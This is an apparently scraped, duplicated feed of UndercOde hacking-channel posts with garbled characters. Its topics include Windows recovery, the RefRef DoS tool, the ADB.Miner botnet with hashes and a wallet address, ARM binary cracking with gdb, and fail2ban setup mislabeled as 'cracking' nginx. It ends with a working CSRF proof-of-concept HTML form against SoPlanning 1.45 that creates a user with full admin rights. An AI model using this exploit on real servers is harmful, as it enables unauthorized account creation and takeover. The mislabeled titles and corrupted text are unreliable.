β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ How to solve the winodws error recovery by UndercOde:
> generally we will choose to successfully restart the configuration and restart; in fact, this is a cure for the symptoms and not the root cause, and such problems will still occur repeatedly. Winodws error recovery tips are generally caused by recently installed hardware or software, the following editor will share how to solve windows error recovery.
t.me/UndercOdeTesting
π¦ ππΌππ πππΈβπ
A) Determine when the error occurs
> If the error occurs while setting up a new computer, or after recovering the computer, select "Open Startup Repair (Recommended)" from the error screen and let Windows repair its files.
> If the error persists after the repair, please perform a system recovery to restore the computer to its original configuration. After the recovery is complete, make sure that you have set up Windows and that you can see all the icons and sidebars on the Windows desktop before shutting down your computer.
2) If this error occurs during normal use, or after you recently added software or hardware, follow these steps to recover your Windows desktop.
B) Remove recently added hardware
> Follow these steps to disconnect recently added hardware and check for errors.
Note: If new internal devices (sound cards, hard disks, etc.) are added to the computer before the error occurs, disconnect these internal hardware before performing the following operations.
1) Turn off the computer and unplug the power cord.
2) Disconnect all unnecessary peripherals (printers, scanners, cameras, zip drives, telephone lines, network cables, and other devices). Only mouse, keyboard, and monitor connections remain.
3) Press and hold the "Power" button on the front of the computer. Release after five seconds.
4)Reinsert the power cord.
5)Start the computer.
6)The display shows the information again.
7) If the error recurs, skip to the next step.
8) If the computer successfully enters the Windows desktop instead of restarting with an error message, reconnect a device and wait for Windows to recognize the device.
9) Connect one device at a time and restart the computer after each connection until you find the device that caused the error. Do not use equipment that is known to cause errors.
C) Repair
> In the error screen, select "Open Startup Repair (Recommended)" and let Windows repair its files. If the error recurs, proceed to the next step and use System Restore.
D) Use System Restore
Follow these steps to restore Windows to an earlier time:
1) Shut down the computer.
2) Disconnect all devices except the mouse, keyboard, and monitor.
3)Start the computer and press the "F8" key repeatedly when the logo screen appears. The Windows startup screen appears.
4)Use the up and down arrow keys to highlight "Safe Mode with Command Prompt" and press the "Enter" key. If the error message appears again, skip to the next step and perform a system recovery.
5) When the login screen appears, select "Administrator" and enter the password (if any).
6) Click "Start" β "All Programs" β "Accessories" in turn, and click "Command Prompt". The Command Prompt window opens.
7) Enter in the command prompt:
cd \ windows \ system32 \ restore
Then press the keyboard "Enter"
8) Enter the command again: rstrui
Then press the "Enter" key
9)The system will open the "System Restore" program
π¦ How to solve the winodws error recovery by UndercOde:
> generally we will choose to successfully restart the configuration and restart; in fact, this is a cure for the symptoms and not the root cause, and such problems will still occur repeatedly. Winodws error recovery tips are generally caused by recently installed hardware or software, the following editor will share how to solve windows error recovery.
t.me/UndercOdeTesting
π¦ ππΌππ πππΈβπ
A) Determine when the error occurs
> If the error occurs while setting up a new computer, or after recovering the computer, select "Open Startup Repair (Recommended)" from the error screen and let Windows repair its files.
> If the error persists after the repair, please perform a system recovery to restore the computer to its original configuration. After the recovery is complete, make sure that you have set up Windows and that you can see all the icons and sidebars on the Windows desktop before shutting down your computer.
2) If this error occurs during normal use, or after you recently added software or hardware, follow these steps to recover your Windows desktop.
B) Remove recently added hardware
> Follow these steps to disconnect recently added hardware and check for errors.
Note: If new internal devices (sound cards, hard disks, etc.) are added to the computer before the error occurs, disconnect these internal hardware before performing the following operations.
1) Turn off the computer and unplug the power cord.
2) Disconnect all unnecessary peripherals (printers, scanners, cameras, zip drives, telephone lines, network cables, and other devices). Only mouse, keyboard, and monitor connections remain.
3) Press and hold the "Power" button on the front of the computer. Release after five seconds.
4)Reinsert the power cord.
5)Start the computer.
6)The display shows the information again.
7) If the error recurs, skip to the next step.
8) If the computer successfully enters the Windows desktop instead of restarting with an error message, reconnect a device and wait for Windows to recognize the device.
9) Connect one device at a time and restart the computer after each connection until you find the device that caused the error. Do not use equipment that is known to cause errors.
C) Repair
> In the error screen, select "Open Startup Repair (Recommended)" and let Windows repair its files. If the error recurs, proceed to the next step and use System Restore.
D) Use System Restore
Follow these steps to restore Windows to an earlier time:
1) Shut down the computer.
2) Disconnect all devices except the mouse, keyboard, and monitor.
3)Start the computer and press the "F8" key repeatedly when the logo screen appears. The Windows startup screen appears.
4)Use the up and down arrow keys to highlight "Safe Mode with Command Prompt" and press the "Enter" key. If the error message appears again, skip to the next step and perform a system recovery.
5) When the login screen appears, select "Administrator" and enter the password (if any).
6) Click "Start" β "All Programs" β "Accessories" in turn, and click "Command Prompt". The Command Prompt window opens.
7) Enter in the command prompt:
cd \ windows \ system32 \ restore
Then press the keyboard "Enter"
8) Enter the command again: rstrui
Then press the "Enter" key
9)The system will open the "System Restore" program
Written by UndercOde
β β β ο½ππ»βΊπ«Δπ¬πβ β β ββ β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦How to track down a process or potential virus that is eating my bandwidth on Windows 10 ? From Wiki :
1) Start Task Manger (CTRL+SHIFT+ESC)
2) Select the Performance tab
3) Click the Resource Monitor... button at the bottom of the tab
4) When Resource Monitor starts click the Network tab
Investigate all the Processes with Network Activity to locate the offending process
5) If you are unsure about a particular process you can right click on it and Search Online for more information on that process:
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦How to track down a process or potential virus that is eating my bandwidth on Windows 10 ? From Wiki :
1) Start Task Manger (CTRL+SHIFT+ESC)
2) Select the Performance tab
3) Click the Resource Monitor... button at the bottom of the tab
4) When Resource Monitor starts click the Network tab
Investigate all the Processes with Network Activity to locate the offending process
5) If you are unsure about a particular process you can right click on it and Search Online for more information on that process:
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦What is RefRef Malware ?
1) RefRef is a Perl-based DoS attack tool developed by the Hacktivist group βAnonymousβ that uses a vulnerability in MySQL to perform an SQL injection involving the MySQL BENCHMARK() function.
2) RefRef abuses the BENCHMARK () function which allows for the repeated execution of an expression in order to exhaust a targeted serverβs resources.
instagram.com/UndercOdeTestingCompany
3) Unlike LOIC (a network stress testing tool whose use to level DDoS attacks was popularized by Anonymous),
4) RefRef does not require a vast number of machines in order to take down a server due to the nature of its attack vector.
5) If the serverβs backend uses MySQL and is vulnerable, few machines are needed to cause a significant outage. A 17-second attack from a single machine on 2011 was able to bring Pastebin offline for 42 minutes.
@UndercOdeOfficial
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦What is RefRef Malware ?
1) RefRef is a Perl-based DoS attack tool developed by the Hacktivist group βAnonymousβ that uses a vulnerability in MySQL to perform an SQL injection involving the MySQL BENCHMARK() function.
2) RefRef abuses the BENCHMARK () function which allows for the repeated execution of an expression in order to exhaust a targeted serverβs resources.
instagram.com/UndercOdeTestingCompany
3) Unlike LOIC (a network stress testing tool whose use to level DDoS attacks was popularized by Anonymous),
4) RefRef does not require a vast number of machines in order to take down a server due to the nature of its attack vector.
5) If the serverβs backend uses MySQL and is vulnerable, few machines are needed to cause a significant outage. A 17-second attack from a single machine on 2011 was able to bring Pastebin offline for 42 minutes.
@UndercOdeOfficial
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ ADB Miner: A Botnet Surfaces FROM 2018 :
Radwareβs Emergency Response Team has been monitoring the emergence of a new botnet
pinterest.com/UndercOdeOfficial
> ADB.miner malware takes advantage of Android-based devices that expose debug capabilities to the Internet. When a remote host exposes its Android Debug Bridge (ADB) control port, any Android emulator on the Internet has full install, start, reboot and root shell access without authentication.
>Part of the malware, xmrig binaries (Monero cryptocurrency miners) are executing on the devices.
π¦ Bot User Tools
> Getting root shell access using Android SDK platform tools:
C:\bin\android-platform-tools\platform-tools>adb shell "id"
uid=0(root) gid=0(root)
> All ADB connections start with the CNXN fixed string, matching the pattern intercepted by Radwareβs honeypots:
0000000: 43 4e 58 4e 00 00 00 01 00 10 00 00 07 00 00 00 CNXN
0000010: 32 02 00 00 bc b1 a7 b1 68 6f 73 74 3a 3a 00 2.......host
Commands performed against a target device:
{ name: "adb"; service: "adb"; host: "100.115.92.2"; port: "5555"; probe: [ "^CNXN" ]; }
>The Monero wallet address that collects the return on the mining investment is 44XT4KvmobTQfeWa6PCQF5RDosr2MLWm43AsaE3o5iNRXXTfDbYk2VPHTVedTQHZyfXNzMn8YYF2466d3FSDT7gJS8gdHAr
π¦Hashes/IOC
91f0ffdec958388adab53b5a473265d7ce86d0a3da4622490c9199baecce31b8 xmrig32
a881b27c388448cf9d77443ea23be4d751b3b565b773e1d97a7dbb0702189812 xmrig64
940b47e9b71ba4968cfefd7ae6c374a319f2439e9b71ee0965e20a0ce00dcd67 droidbot
6b973256325b0f93c45a1ae8a964218b6c86aa3c509453f0325754eb2dcfef0e droidbot.apk
π¦ Effective DDoS Protection Essentials
1) Hybrid DDoS Protection - On-premise and cloud DDoS protection for real-time DDoS attack prevention that also addresses high volume attacks and protects from pipe saturation
2) Behavioral-Based Detection - Quickly and accurately identify and block anomalies while allowing legitimate traffic through
3) Real-Time Signature Creation - Promptly protect from unknown threats and zero-day attacks
4) A Cyber-Security Emergency Response Plan - A dedicated emergency team of experts who have experience with Internet of Things security and handling IoT outbreaks
5) Intelligence on Active Threat Actors β high fidelity, correlated and analyzed date for preemptive protection against currently active known attackers.
@UndercOdeOfficial
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ ADB Miner: A Botnet Surfaces FROM 2018 :
Radwareβs Emergency Response Team has been monitoring the emergence of a new botnet
pinterest.com/UndercOdeOfficial
> ADB.miner malware takes advantage of Android-based devices that expose debug capabilities to the Internet. When a remote host exposes its Android Debug Bridge (ADB) control port, any Android emulator on the Internet has full install, start, reboot and root shell access without authentication.
>Part of the malware, xmrig binaries (Monero cryptocurrency miners) are executing on the devices.
π¦ Bot User Tools
> Getting root shell access using Android SDK platform tools:
C:\bin\android-platform-tools\platform-tools>adb shell "id"
uid=0(root) gid=0(root)
> All ADB connections start with the CNXN fixed string, matching the pattern intercepted by Radwareβs honeypots:
0000000: 43 4e 58 4e 00 00 00 01 00 10 00 00 07 00 00 00 CNXN
0000010: 32 02 00 00 bc b1 a7 b1 68 6f 73 74 3a 3a 00 2.......host
Commands performed against a target device:
{ name: "adb"; service: "adb"; host: "100.115.92.2"; port: "5555"; probe: [ "^CNXN" ]; }
>The Monero wallet address that collects the return on the mining investment is 44XT4KvmobTQfeWa6PCQF5RDosr2MLWm43AsaE3o5iNRXXTfDbYk2VPHTVedTQHZyfXNzMn8YYF2466d3FSDT7gJS8gdHAr
π¦Hashes/IOC
91f0ffdec958388adab53b5a473265d7ce86d0a3da4622490c9199baecce31b8 xmrig32
a881b27c388448cf9d77443ea23be4d751b3b565b773e1d97a7dbb0702189812 xmrig64
940b47e9b71ba4968cfefd7ae6c374a319f2439e9b71ee0965e20a0ce00dcd67 droidbot
6b973256325b0f93c45a1ae8a964218b6c86aa3c509453f0325754eb2dcfef0e droidbot.apk
π¦ Effective DDoS Protection Essentials
1) Hybrid DDoS Protection - On-premise and cloud DDoS protection for real-time DDoS attack prevention that also addresses high volume attacks and protects from pipe saturation
2) Behavioral-Based Detection - Quickly and accurately identify and block anomalies while allowing legitimate traffic through
3) Real-Time Signature Creation - Promptly protect from unknown threats and zero-day attacks
4) A Cyber-Security Emergency Response Plan - A dedicated emergency team of experts who have experience with Internet of Things security and handling IoT outbreaks
5) Intelligence on Active Threat Actors β high fidelity, correlated and analyzed date for preemptive protection against currently active known attackers.
@UndercOdeOfficial
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ Assembly debugging skills and simple cracking by UndercOde
This post is suitable for students who are interested in assembly debugging or want to get started cracking.
π¦ The following uses arm linux (android) as an example.
1) elf introduction
2) For the next crack we are going to make, the most important information is to know that elf is mainly composed of headers, tables, and segments.
3) Some commonly used tools are objdumpand readelf. Of course, gdb is even more essential.
4) To see the distribution of each segment:
> readelf -S a.out
5) To (hexadecimal) output a segment (output here .rodata):
readelf -x .rodata a.out
6) To disassemble the code snippet ( .text
>objdump -d a.out > a.out.dum
π¦ Assembly instruction
1) Because the libraries to be cracked are generally stripped and do not see the source code information, they often deal with assembly instructions.
2) Different architectures have different instructions, such as x86, arm. But basically the same is the assembly principle, that is, registers, PC (program pointer), SP (stack pointer), constant / stack / memory read and write. Only by understanding these basic principles, and then looking at the instructions and understanding the architectural differences, can we be more comfortable.
3) Here I want to hack an arm library, so I know some arm instructions in advance, you can refer to arm infocenter .
π¦ gdb
1)objdumpInferring the source code directly from the parsed assembly code is a labor-intensive task. You have to force yourself to work like a machine, and imagine the states of various registers and pointers in your brain. (And often the assembly code is -Ooptimized)
2) Therefore, by gdbβdebuggingβ the target file in the running state, the value of the register can be printed in real time, the calling sequence of the process can be tracked, and the code principle can be quickly clarified.
3)Because the instructions to be debugged are assembly instructions, they are slightly different from regular source-based debugging.
Here are a few commonly used gdb commands.
> Display disassembly code:
layout asm
Step into the assembly code:
si
Step-by-step assembly code:
ni
> Display register information:
info registers
> Print register value:
p /x $r0
> Print the memory value (assuming r0 holds the memory address)
x $r0
π¦ Assembly debugging skills and simple cracking by UndercOde
This post is suitable for students who are interested in assembly debugging or want to get started cracking.
π¦ The following uses arm linux (android) as an example.
1) elf introduction
2) For the next crack we are going to make, the most important information is to know that elf is mainly composed of headers, tables, and segments.
3) Some commonly used tools are objdumpand readelf. Of course, gdb is even more essential.
4) To see the distribution of each segment:
> readelf -S a.out
5) To (hexadecimal) output a segment (output here .rodata):
readelf -x .rodata a.out
6) To disassemble the code snippet ( .text
>objdump -d a.out > a.out.dum
π¦ Assembly instruction
1) Because the libraries to be cracked are generally stripped and do not see the source code information, they often deal with assembly instructions.
2) Different architectures have different instructions, such as x86, arm. But basically the same is the assembly principle, that is, registers, PC (program pointer), SP (stack pointer), constant / stack / memory read and write. Only by understanding these basic principles, and then looking at the instructions and understanding the architectural differences, can we be more comfortable.
3) Here I want to hack an arm library, so I know some arm instructions in advance, you can refer to arm infocenter .
π¦ gdb
1)objdumpInferring the source code directly from the parsed assembly code is a labor-intensive task. You have to force yourself to work like a machine, and imagine the states of various registers and pointers in your brain. (And often the assembly code is -Ooptimized)
2) Therefore, by gdbβdebuggingβ the target file in the running state, the value of the register can be printed in real time, the calling sequence of the process can be tracked, and the code principle can be quickly clarified.
3)Because the instructions to be debugged are assembly instructions, they are slightly different from regular source-based debugging.
Here are a few commonly used gdb commands.
> Display disassembly code:
layout asm
Step into the assembly code:
si
Step-by-step assembly code:
ni
> Display register information:
info registers
> Print register value:
p /x $r0
> Print the memory value (assuming r0 holds the memory address)
x $r0
Written by UndercOde
β β β ο½ππ»βΊπ«Δπ¬πβ β β ββ β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦How to Crack Nginux Server :
twitter.com/UndercOdeTC
π¦ ππΌππ πππΈβπ
> A brief introduction to fail2ban
> Fail2ban can monitor the system log, match the error information in the log (using regular expressions), and perform corresponding masking actions (supporting multiple, generally calling iptables), is a very useful and powerful software.
> For example: the attacker keeps trying to exhaustively use SSH, SMTP, FTP passwords, etc. As long as the preset value is reached, fail2ban will call the firewall to block this IP, and can send an email to notify the system administrator.
π¦ Functions and features:
1) Support a large number of services: sshd, apache, qmail, etc.
2) Support multiple actions: iptables, tcp-wrapper, shorewall, mail notifications, etc.
3) Support wildcard characters in the logpath option
4) Gamin support is required (Gamin is used to monitor files and directories Whether to change)
5) If email notification is required, the system must ensure that email can be sent normally in advance
π¦ Fail2ban installation and configuration file introduction
> Installation
1) epel-release
2) yum -y install epel-release
# fail2ban
3) yum -y install fail2ban
π¦ File directory structure
/etc/fail2ban ## fail2ban
/etc/fail2ban/action.d ## iptables γmail ...
/etc/fail2ban/filter.d
/etc/fail2ban/jail.conf ## fail2ban
/etc/fail2ban/fail2ban.conf ## fail2ban γ
sock
Written by UndercOde
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦How to Crack Nginux Server :
twitter.com/UndercOdeTC
π¦ ππΌππ πππΈβπ
> A brief introduction to fail2ban
> Fail2ban can monitor the system log, match the error information in the log (using regular expressions), and perform corresponding masking actions (supporting multiple, generally calling iptables), is a very useful and powerful software.
> For example: the attacker keeps trying to exhaustively use SSH, SMTP, FTP passwords, etc. As long as the preset value is reached, fail2ban will call the firewall to block this IP, and can send an email to notify the system administrator.
π¦ Functions and features:
1) Support a large number of services: sshd, apache, qmail, etc.
2) Support multiple actions: iptables, tcp-wrapper, shorewall, mail notifications, etc.
3) Support wildcard characters in the logpath option
4) Gamin support is required (Gamin is used to monitor files and directories Whether to change)
5) If email notification is required, the system must ensure that email can be sent normally in advance
π¦ Fail2ban installation and configuration file introduction
> Installation
1) epel-release
2) yum -y install epel-release
# fail2ban
3) yum -y install fail2ban
π¦ File directory structure
/etc/fail2ban ## fail2ban
/etc/fail2ban/action.d ## iptables γmail ...
/etc/fail2ban/filter.d
/etc/fail2ban/jail.conf ## fail2ban
/etc/fail2ban/fail2ban.conf ## fail2ban γ
sock
Written by UndercOde
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦Crack Nginux Server By UndercOde:
PART 2
> fail2ban.conf configuration file
1) shell > grep -v ^# /etc/fail2ban/fail2ban.conf
[Definition]
loglevel = 3
logtarget = /var/log/fail2ban.log ## fail2ban ]
socket = /var/run/fail2ban/fail2ban.sock ## sock
pidfile = /var/run/fail2ban/fail2ban.pid ## pid
π¦ jail.conf protection configuration
shell > grep -v ^# /etc/fail2ban/jail.conf
[DEFAULT]
ignoreip = 127.0.0.1/8
bantime = 600
findtime = 600
maxretry = 3
backend = auto
usedns = warn
[ssh-iptables]
enabled = true
filter = sshd sshd.conf
action = iptables[name=SSH, port=ssh, protocol=tcp]
logpath = /var/log/secure
maxretry = 5
π¦ Configure to prevent the nginx server web directory from being scanned by hackers
1) Add the following to the end of the jail.conf file
2) shell > vim /etc/fail2ban/jail.conf
[nginx]
enabled = true
port = http,https
filter = nginx
action = iptables[name=nginx, port=http, protocol=tcp]
logpath = /www/lnmp/log/nginx/access.log
bantime = 3600
findtime = 60
maxretry = 5
π¦ Add the nginx.conf file in the etc / fail2ban / filter.d directory and append the following:
1) shell > vim /etc/fail2ban/filter.d/nginx.conf
[Definition]
2) failregex = <HOST> -.*- .*HTTP/1.* 404 .*$
ignoreregex
π¦Crack Nginux Server By UndercOde:
PART 2
> fail2ban.conf configuration file
1) shell > grep -v ^# /etc/fail2ban/fail2ban.conf
[Definition]
loglevel = 3
logtarget = /var/log/fail2ban.log ## fail2ban ]
socket = /var/run/fail2ban/fail2ban.sock ## sock
pidfile = /var/run/fail2ban/fail2ban.pid ## pid
π¦ jail.conf protection configuration
shell > grep -v ^# /etc/fail2ban/jail.conf
[DEFAULT]
ignoreip = 127.0.0.1/8
bantime = 600
findtime = 600
maxretry = 3
backend = auto
usedns = warn
[ssh-iptables]
enabled = true
filter = sshd sshd.conf
action = iptables[name=SSH, port=ssh, protocol=tcp]
logpath = /var/log/secure
maxretry = 5
π¦ Configure to prevent the nginx server web directory from being scanned by hackers
1) Add the following to the end of the jail.conf file
2) shell > vim /etc/fail2ban/jail.conf
[nginx]
enabled = true
port = http,https
filter = nginx
action = iptables[name=nginx, port=http, protocol=tcp]
logpath = /www/lnmp/log/nginx/access.log
bantime = 3600
findtime = 60
maxretry = 5
π¦ Add the nginx.conf file in the etc / fail2ban / filter.d directory and append the following:
1) shell > vim /etc/fail2ban/filter.d/nginx.conf
[Definition]
2) failregex = <HOST> -.*- .*HTTP/1.* 404 .*$
ignoreregex
Written by UndercOde
β β β ο½ππ»βΊπ«Δπ¬πβ β β ββ β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦Crack Nginux 2020 Part 3 by UndercOde:
pits skipped by fail2ban
π¦ fail2ban fails to start
1) Check if the configuration file format is correct
> fail2ban-regex /www/lnmp/log/nginx/access.log /etc/fail2ban/filter.d/nginx.conf
2) Query the startup cause according to the startup information, and enter the pit (nginx log file path configuration error)
> fail2ban-client start
π¦ How to delete the disabled blacklist IP in fail2ban
fail2ban-configuration
1) fail2ban-client set // unbanip IP
2) fail2ban-client set nginx unbanip 8.8.8.8
iptaables delete corresponding rules
3) shell > iptables -nL --line-numbers
4) Chain INPUT (policy ACCEPT)
num target prot opt source destination
> f2b-nginx tcp -- 0.0.0.0/0 0.0.0.0/0 tcp dpt:80
5) Chain FORWARD (policy ACCEPT)
>num target prot opt source destination
6) Chain OUTPUT (policy ACCEPT)
num target prot opt source destination
7) Chain f2b-nginx (1 references)
> num target prot opt source destination
> REJECT all -- 8.8.8.8 0.0.0.0/0 reject-with icmp-port-unreachable
> REJECT all -- 9.9.9.9 0.0.0.0/0 reject-with icmp-port-unreachable
> RETURN all -- 0.0.0.0/0 0.0.0.0/0
π¦ iptables
shell > iptables -D f2b-nginx 1
USE THOSE TUTORIALS FOR LEARN ONLY
π¦Crack Nginux 2020 Part 3 by UndercOde:
pits skipped by fail2ban
π¦ fail2ban fails to start
1) Check if the configuration file format is correct
> fail2ban-regex /www/lnmp/log/nginx/access.log /etc/fail2ban/filter.d/nginx.conf
2) Query the startup cause according to the startup information, and enter the pit (nginx log file path configuration error)
> fail2ban-client start
π¦ How to delete the disabled blacklist IP in fail2ban
fail2ban-configuration
1) fail2ban-client set // unbanip IP
2) fail2ban-client set nginx unbanip 8.8.8.8
iptaables delete corresponding rules
3) shell > iptables -nL --line-numbers
4) Chain INPUT (policy ACCEPT)
num target prot opt source destination
> f2b-nginx tcp -- 0.0.0.0/0 0.0.0.0/0 tcp dpt:80
5) Chain FORWARD (policy ACCEPT)
>num target prot opt source destination
6) Chain OUTPUT (policy ACCEPT)
num target prot opt source destination
7) Chain f2b-nginx (1 references)
> num target prot opt source destination
> REJECT all -- 8.8.8.8 0.0.0.0/0 reject-with icmp-port-unreachable
> REJECT all -- 9.9.9.9 0.0.0.0/0 reject-with icmp-port-unreachable
> RETURN all -- 0.0.0.0/0 0.0.0.0/0
π¦ iptables
shell > iptables -D f2b-nginx 1
USE THOSE TUTORIALS FOR LEARN ONLY
Written by UndercOde
β β β ο½ππ»βΊπ«Δπ¬πβ β β ββ β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ IOTA cryptocurrency shuts down entire network after wallet vulnerability is exploited
Recently News from twitter.com/UnderCodeTC
> IOTA is not a cryptocurrency based on the mathematical concept of a directed acyclic graph, not a blockchain.It was born in 2017, the hottest of Bitcoin.
> Last week, the foundation managing IOTA shut down the entire cryptocurrency network after learning that hackers were using the official wallet application vulnerability to steal user funds .
>The attack occurred on February 12, and within 25 minutes of receiving the report, the IOTA Foundation shut down Coordinator, the last node used to approve the transaction, preventing hackers from stealing user funds, but in fact closed the entire network.
>The attacker is believed to have targeted 10 high-value users, using the vulnerability of the official wallet application Trinity to steal funds. According to unofficial sources, about $ 1.6 million worth of IOTA coins were stolen. The IOTA team released version 1.4 on Sunday, fixing an exploited vulnerability. The network is still offline and developers are finalizing remediation plans.
π¦ IOTA cryptocurrency shuts down entire network after wallet vulnerability is exploited
Recently News from twitter.com/UnderCodeTC
> IOTA is not a cryptocurrency based on the mathematical concept of a directed acyclic graph, not a blockchain.It was born in 2017, the hottest of Bitcoin.
> Last week, the foundation managing IOTA shut down the entire cryptocurrency network after learning that hackers were using the official wallet application vulnerability to steal user funds .
>The attack occurred on February 12, and within 25 minutes of receiving the report, the IOTA Foundation shut down Coordinator, the last node used to approve the transaction, preventing hackers from stealing user funds, but in fact closed the entire network.
>The attacker is believed to have targeted 10 high-value users, using the vulnerability of the official wallet application Trinity to steal funds. According to unofficial sources, about $ 1.6 million worth of IOTA coins were stolen. The IOTA team released version 1.4 on Sunday, fixing an exploited vulnerability. The network is still offline and developers are finalizing remediation plans.
Written by UndercOde
β β β ο½ππ»βΊπ«Δπ¬πβ β β ββ β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ google.com Now new terms 20-feb-2020
t.me/UndercOdeTesting
>These terms help define the relationship between you and Google. Broadly speaking, we give you permission to use our services if you agree to follow these terms, which reflect how Googleβs business works and how we earn money. When we speak of βGoogle,β βwe,β βus,β and βour,β we mean Google LLC and its affiliates.
>We provide a broad range of services that are subject to these terms, including:
1) apps and sites (like Search and Maps)
2) platforms (like Google Play)
integrated services (like Maps embedded in other companiesβ apps or sites)
3) devices (like Google Home)
4) Our services are designed to work together, making it easier for you to move from one activity to the next. For example, Maps can remind you to leave for an appointment that appears in your Google Calendar.
SEE MORE ON Google Webiste
> https://policies.google.com/terms/update?utm_source=hpp&utm_medium=pushdown&utm_campaign=tosso
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ google.com Now new terms 20-feb-2020
t.me/UndercOdeTesting
>These terms help define the relationship between you and Google. Broadly speaking, we give you permission to use our services if you agree to follow these terms, which reflect how Googleβs business works and how we earn money. When we speak of βGoogle,β βwe,β βus,β and βour,β we mean Google LLC and its affiliates.
>We provide a broad range of services that are subject to these terms, including:
1) apps and sites (like Search and Maps)
2) platforms (like Google Play)
integrated services (like Maps embedded in other companiesβ apps or sites)
3) devices (like Google Home)
4) Our services are designed to work together, making it easier for you to move from one activity to the next. For example, Maps can remind you to leave for an appointment that appears in your Google Calendar.
SEE MORE ON Google Webiste
> https://policies.google.com/terms/update?utm_source=hpp&utm_medium=pushdown&utm_campaign=tosso
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ 2020 EXPLOITE Cross-Site Request Forgery (Add User)
# Date: 2020-02-14
instagram.com/UndercOdeTestingCompany
0> The SoPlanning 1.45 application is vulnerable to CSRF that allows for arbitrary
>user creation and for changing passwords (Specifically the admin password)
π¦ POC For aribtrary user creation:
# CSRF POC:
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://10.22.6.208/soplanning/www/process/xajax_server.php" method="POST">
<input type="hidden" name="xajax" value="submitFormUser" />
<input type="hidden" name="xajaxr" value="1581700271752" />
<input type="hidden" name="xajaxargs[]" value="Testing" />
<input type="hidden" name="xajaxargs[]" value="" />
<input type="hidden" name="xajaxargs[]" value="1" />
<input type="hidden" name="xajaxargs[]" value="Testing" />
<input type="hidden" name="xajaxargs[]" value="test@test.com" />
<input type="hidden" name="xajaxargs[]" value="Test" />
<input type="hidden" name="xajaxargs[]" value="test" />
<input type="hidden" name="xajaxargs[]" value="true" />
<input type="hidden" name="xajaxargs[]" value="#FFFFFF" />
<input type="hidden" name="xajaxargs[]" value="false" />
<input type="hidden" name="xajaxargs[]" value="false" />
<input type="hidden" name="xajaxargs[]" value="<xjxobj><e><k>0</k><v>users_manage_all</v></e><e><k>1</k><v>projects_manage_all</v></e><e><k>2</k><v>projectgroups_manage_all</v></e><e><k>3</k><v>tasks_modify_all</v></e><e><k>4</k><v>tasks_view_all_projects</v></e><e><k>5</k><v>tasks_view_all_users</v></e><e><k>6</k><v>lieux_all</v></e><e><k>7</k><v>ressources_all</v></e><e><k>8</k><v>audit_restore</v></e><e><k>9</k><v>parameters_all</v></e><e><k>10</k><v>stats_users</v></e><e><k>11</k><v>stats_projects</v></e></xjxobj>" />
<input type="hidden" name="xajaxargs[]" value="" />
<input type="hidden" name="xajaxargs[]" value="" />
<input type="hidden" name="xajaxargs[]" value="" />
<input type="hidden" name="xajaxargs[]" value="" />
<input type="hidden" name="xajaxargs[]" value="" />
<input type="hidden" name="xajaxargs[]" value="true" />
<input type="hidden" name="xajaxargs[]" value="<xjxobj></xjxobj>" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
π¦ Use This Exploite for learn Only
Written by UndercOde
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ 2020 EXPLOITE Cross-Site Request Forgery (Add User)
# Date: 2020-02-14
instagram.com/UndercOdeTestingCompany
0> The SoPlanning 1.45 application is vulnerable to CSRF that allows for arbitrary
>user creation and for changing passwords (Specifically the admin password)
π¦ POC For aribtrary user creation:
# CSRF POC:
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://10.22.6.208/soplanning/www/process/xajax_server.php" method="POST">
<input type="hidden" name="xajax" value="submitFormUser" />
<input type="hidden" name="xajaxr" value="1581700271752" />
<input type="hidden" name="xajaxargs[]" value="Testing" />
<input type="hidden" name="xajaxargs[]" value="" />
<input type="hidden" name="xajaxargs[]" value="1" />
<input type="hidden" name="xajaxargs[]" value="Testing" />
<input type="hidden" name="xajaxargs[]" value="test@test.com" />
<input type="hidden" name="xajaxargs[]" value="Test" />
<input type="hidden" name="xajaxargs[]" value="test" />
<input type="hidden" name="xajaxargs[]" value="true" />
<input type="hidden" name="xajaxargs[]" value="#FFFFFF" />
<input type="hidden" name="xajaxargs[]" value="false" />
<input type="hidden" name="xajaxargs[]" value="false" />
<input type="hidden" name="xajaxargs[]" value="<xjxobj><e><k>0</k><v>users_manage_all</v></e><e><k>1</k><v>projects_manage_all</v></e><e><k>2</k><v>projectgroups_manage_all</v></e><e><k>3</k><v>tasks_modify_all</v></e><e><k>4</k><v>tasks_view_all_projects</v></e><e><k>5</k><v>tasks_view_all_users</v></e><e><k>6</k><v>lieux_all</v></e><e><k>7</k><v>ressources_all</v></e><e><k>8</k><v>audit_restore</v></e><e><k>9</k><v>parameters_all</v></e><e><k>10</k><v>stats_users</v></e><e><k>11</k><v>stats_projects</v></e></xjxobj>" />
<input type="hidden" name="xajaxargs[]" value="" />
<input type="hidden" name="xajaxargs[]" value="" />
<input type="hidden" name="xajaxargs[]" value="" />
<input type="hidden" name="xajaxargs[]" value="" />
<input type="hidden" name="xajaxargs[]" value="" />
<input type="hidden" name="xajaxargs[]" value="true" />
<input type="hidden" name="xajaxargs[]" value="<xjxobj></xjxobj>" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
π¦ Use This Exploite for learn Only
Written by UndercOde
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
